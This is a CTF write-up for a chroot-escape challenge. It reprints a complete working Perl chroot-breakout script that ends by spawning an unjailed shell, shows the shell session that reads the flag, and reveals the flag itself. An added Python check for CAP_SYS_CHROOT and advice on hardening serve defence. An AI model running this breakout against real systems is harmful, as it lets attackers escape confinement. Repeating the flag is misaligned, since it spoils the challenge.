Not So Great Escape [Misc]

Not So Great Escape

We've set up a chroot for you to develop your musl code in. It's bare, so install whatever you need. The password is ... Feel free to log in with: socat -,raw,echo=0 tcp:challenges.tamuctf.com:4353

Recon

Looks like it's an Alpine Linux chroot, meaning apk is the package manager of choice. We did some quick searching and found these slides on breaking out of chroot. We then searched for a ready-made script for one of the basic methods and found this (also see the Code section below).

The basic idea behind the method is to first open a directory inside the jail and keep the file handle, then create a new chroot underneath it that does not contain a path to that directory. We then chdir to the open handle from inside the new chroot, which now has no way to represent a path to it.

The kernel does not re-resolve an already open directory handle against the new root, so the process ends up with a working directory outside its current chroot. From there we simply cd upwards with ".." until the inode of "." equals the inode of "..", which means we have reached the real root, and then chroot into that.
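The second chroot(".") in this method is the step that needs privilege: chroot(2) fails with EPERM unless the caller holds CAP_SYS_CHROOT, which a root shell inside the jail (note the "/ #" prompt below) still has. The check below is an added example, not part of the original writeup or of the pentestmonkey script; it parses the CapEff line of /proc/<pid>/status and reports whether the process could still issue chroot(2). It assumes a Linux /proc layout and the CAP_SYS_CHROOT bit number 18 from linux/capability.h; the sample status excerpts are constructed, not captured from the challenge box.

```python
"""Check whether a (supposedly jailed) process still holds CAP_SYS_CHROOT.

Added example, not from the writeup. Assumes Linux /proc/<pid>/status format
and CAP_SYS_CHROOT == 18 (linux/capability.h).
"""
import os
import re

CAP_SYS_CHROOT = 18  # capability number from linux/capability.h


def parse_cap_field(status_text: str, field: str = "CapEff") -> int:
    """Return the named capability mask (a 64-bit hex value) as an int."""
    m = re.search(rf"^{field}:\s*([0-9a-fA-F]+)\s*$", status_text, re.MULTILINE)
    if m is None:
        raise ValueError(f"{field} not found in status text")
    return int(m.group(1), 16)


def has_capability(cap_mask: int, cap_number: int) -> bool:
    """True if bit cap_number is set in cap_mask."""
    return bool((cap_mask >> cap_number) & 1)


def can_chroot(status_text: str) -> bool:
    """True if the effective set holds CAP_SYS_CHROOT, i.e. chroot(2) would
    succeed and the open-handle breakout above would work from this process."""
    return has_capability(parse_cap_field(status_text, "CapEff"), CAP_SYS_CHROOT)


def check_self() -> bool:
    """Run the check against the current process (Linux only)."""
    with open("/proc/self/status") as f:
        return can_chroot(f.read())


# Constructed sample excerpts of /proc/<pid>/status (not real captures).
ROOT_IN_JAIL = "Name:\tsh\nUid:\t0\t0\t0\t0\nCapEff:\t000001ffffffffff\n"
DROPPED_PRIVS = "Name:\tsh\nUid:\t1000\t1000\t1000\t1000\nCapEff:\t0000000000000000\n"
NO_CHROOT_CAP = "Name:\tsh\nUid:\t0\t0\t0\t0\nCapEff:\t00000000a80025fb\n"

if __name__ == "__main__":
    for label, text in (("root in jail", ROOT_IN_JAIL),
                        ("privileges dropped", DROPPED_PRIVS),
                        ("CAP_SYS_CHROOT removed", NO_CHROOT_CAP)):
        print(f"{label}: can_chroot={can_chroot(text)}")
    if os.path.exists("/proc/self/status"):
        print(f"this process: can_chroot={check_self()}")
```

The practical takeaway for a jail operator is that a chroot is only a boundary if the process inside it cannot call chroot(2) again: drop to an unprivileged uid after chroot(), or remove CAP_SYS_CHROOT from the bounding set, and this method no longer works.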

Code

#!/usr/bin/perl -w
use strict;
# unchroot.pl Dec 2007
# http://pentestmonkey.net/blog/chroot-breakout-perl

# This script may be used for legal purposes only.

# Go to the root of the jail
chdir "/";

# Open filehandle to root of jail
opendir JAILROOT, "." or die "ERROR: Couldn't get file handle to root of jail\n";

# Create a subdir, move into it
mkdir "mysubdir";
chdir "mysubdir";

# Lock ourselves in a new jail
chroot ".";

# Use our filehandle to get back to the root of the old jail
chdir(*JAILROOT);

# Get to the real root
while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) {
        chdir "..";
}

# Lock ourselves in real root - so we're not really in a jail at all now
chroot ".";

# Start an un-jailed shell
system("/bin/sh");

Now, before we can run it, we need to make sure perl is installed on the box: apk add perl. Then we simply run it and we're in the original root:

/ # ls
bin    etc    lib    mnt    proc   root   sbin   sys    usr
dev    home   media  opt    pwn    run    srv    tmp    var
/ # ls pwn
flag.txt             jail                 not-so-great-escape
/ # cat pwn/flag.txt 
gigem{up_up_&_a_way_0u7}

Flag

gigem{up_up_&_a_way_0u7}